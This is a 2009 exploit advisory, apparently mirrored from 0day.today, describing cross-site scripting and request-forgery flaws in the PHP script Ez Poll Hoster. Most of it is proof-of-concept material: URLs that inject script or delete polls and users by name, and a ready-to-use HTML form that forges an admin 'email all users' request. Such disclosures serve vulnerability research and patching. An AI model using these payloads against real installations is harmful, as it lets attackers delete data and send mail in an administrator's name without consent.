Ez Poll Hoster Multiple XSS and XSRF Vulnerabilities

🗓️ 14 Dec 2009 00:00:00Reported by Milos ZivanovicType

zdt🔗 0day.today👁 15 Views

Ez Poll Hoster Multiple XSS and XSRF Vulnerabilities in PH

====================================================
Ez Poll Hoster Multiple XSS and XSRF Vulnerabilities
====================================================

[#-----------------------------------------------------------------------------------------------#]
[#] Application: Ez Poll Hoster
[#] Version: the only one there is
[#] Platform: PHP
[#] Link: http://www.scriptsez.net/?action=details&cat=Polls%20and%20Voting&id=1193942206
[#] Price: 15 USD
[#] Vulnerability: Multiple XSS and XSRF Vulnerabilities
[#-----------------------------------------------------------------------------------------------#]
 
[#]Content
 |--User panel
 |  |--XSS in user panel
 |  |--Delete poll by name
 |
 |--Admin panel
    |--XSS in admin panel
    |--Delete user by name
    |--Email all users
 
[#]User panel
 
[-]XSS in user panel
 
[POC----------------------------------------------------------------------------------------------]
http://localhost/eph/index.php?action=code&pid=[XSS]
[POC----------------------------------------------------------------------------------------------]
 
[-]Delete poll by name
 
[POC----------------------------------------------------------------------------------------------]
http://localhost/eph/index.php?action=delete_poll&pid=[POLL
NAME]&do=true&is_js_confirmed=1
[POC----------------------------------------------------------------------------------------------]
 
[#]Admin panel
 
[-]XSS in admin panel
 
[POC----------------------------------------------------------------------------------------------]
http://localhost/eph/profile.php?action=view&uid=[XSS]
[POC----------------------------------------------------------------------------------------------]
 
[-]Delete user by name
 
[POC----------------------------------------------------------------------------------------------]
http://localhost/eph/admin.php?action=manage&do=delete&uid=[USER
NAME]&is_js_confirmed=1
[POC----------------------------------------------------------------------------------------------]
 
[-]Email all users
 
[EXPLOIT------------------------------------------------------------------------------------------]
<form action="http://localhost/eph/admin.php?action=email&do=true"
method="post">
  <input type="hidden" name="subject" value="this is my subject">
  <input type="hidden" name="message" value="this is my message">
  <input type="submit" name="submit" value="Submit">
</form>
[EXPLOIT------------------------------------------------------------------------------------------]



#  0day.today [2018-04-12]  #

14 Dec 2009 00:00Current

7.1High risk

Vulners AI Score7.1